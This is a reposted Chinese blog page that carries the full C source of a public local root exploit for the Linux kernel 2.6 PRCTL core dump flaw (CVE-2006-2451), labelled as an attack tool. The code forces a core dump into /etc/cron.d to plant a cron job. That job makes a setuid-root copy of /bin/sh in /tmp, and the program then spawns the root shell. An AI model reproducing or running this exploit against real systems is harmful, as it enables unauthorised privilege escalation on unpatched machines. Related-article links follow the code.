Linux Kernel2.6x 最新本地溢位程式碼(轉)
Linux Kernel2.6x 最新本地溢位程式碼(轉)[@more@]工具分類:攻擊程式
執行平臺:Linux
工具大小:1684
Bytes檔案MD5 :f011910d6400652177c3b2e66bfb7144
工具來源:
Linux Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)
PRCTL Core Dump Handling - Local r00tBy: dreyer & RoMaNSoFt[ 10.Jul.2006 ]
執行平臺:Linux
工具大小:1684
Bytes檔案MD5 :f011910d6400652177c3b2e66bfb7144
工具來源:
Linux Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)
PRCTL Core Dump Handling - Local r00tBy: dreyer & RoMaNSoFt[ 10.Jul.2006 ]
CODE:
/*****************************************************/
/* Local r00t Exploit for: */ /* Linux Kernel PRCTL Core Dump Handling */ /* ( BID 18874 / CVE-2006-2451 ) */ /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ /* By: */ /* - dreyer /* - RoMaNSoFt /* [ 10.Jul.2006 ] */ /*****************************************************/ #include #include #include #include #include #include #include #include char *payload=" SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin * * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core "; int main() { int child; struct rlimit corelimit; printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t "); printf("By: dreyer & RoMaNSoFt "); printf("[ 10.Jul.2006 ] "); corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); printf("[*] Creating Cron entry "); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); printf("[*] Sleeping for aprox. one minute (** please wait **) "); sleep(62); printf("[*] Running shell (remember to remove /tmp/sh when finished) ... "); system("/tmp/sh -p"); } 來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10617542/viewspace-960173/,如需轉載,請註明出處,否則將追究法律責任。
上一篇:
Redhat9上配置DNS(轉)
請登入後發表評論
登入
全部評論
|
相關文章
- 溢位程式使用通道對抗防火牆 (轉)防火牆
- php4.0.0遠端溢位原始碼分析與測試程式 (轉)PHP原始碼
- 64位Linux下的棧溢位Linux
- 記憶體溢位:native溢位 和 上層溢位記憶體溢位
- Linux kernel 堆溢位利用方法Linux
- java 程式記憶體溢位Java記憶體溢位
- 【轉】strcpy溢位的攻擊示例
- Linux kernel 堆溢位利用方法(二)Linux
- 阿里大佬講解Java記憶體溢位示例(堆溢位、棧溢位)阿里Java記憶體溢位
- 緩衝區溢位小程式分析
- [二進位制漏洞]棧(Stack)溢位漏洞 Linux篇Linux
- Linux堆溢位漏洞利用之unlinkLinux
- StackOverFlowError(棧溢位)Error
- 整數溢位
- Java 常見記憶體溢位異常與程式碼實現Java記憶體溢位
- 遷移linux的XWindows程式到本地(轉)LinuxWindows
- 如何編碼實現記憶體溢位記憶體溢位
- Java併發程式設計實踐-this溢位Java程式設計
- WEBLOGIC 記憶體溢位 解決方案(轉)Web記憶體溢位
- perl格式串處理整數溢位漏洞(轉)
- IMail SMTP 緩衝區溢位漏洞 (APP,缺陷) (轉)AIAPP
- Java棧溢位|記憶體洩漏|記憶體溢位Java記憶體溢位
- Java程式碼執行記憶體溢位詳解及解決方案Java記憶體溢位
- 記憶體溢位記憶體溢位
- 棧溢位基礎
- Linux pwn入門教程(1)——棧溢位基礎Linux
- 溢位OF和進位CF區別
- 記一次linux x64 的棧溢位Linux
- css 盒子溢位問題CSS
- Java記憶體溢位Java記憶體溢位
- JBOSS記憶體溢位記憶體溢位
- 線上直播原始碼,flutter 溢位幾種佈局方案原始碼Flutter
- 駭客中級技術--緩衝區溢位攻擊(轉)
- 同花順轉股溢價率中位數獲取
- 幽默:程式碼本地漢化
- 堆溢位學習筆記筆記
- 棧溢位基礎及利用
- 聊聊資料溢位的事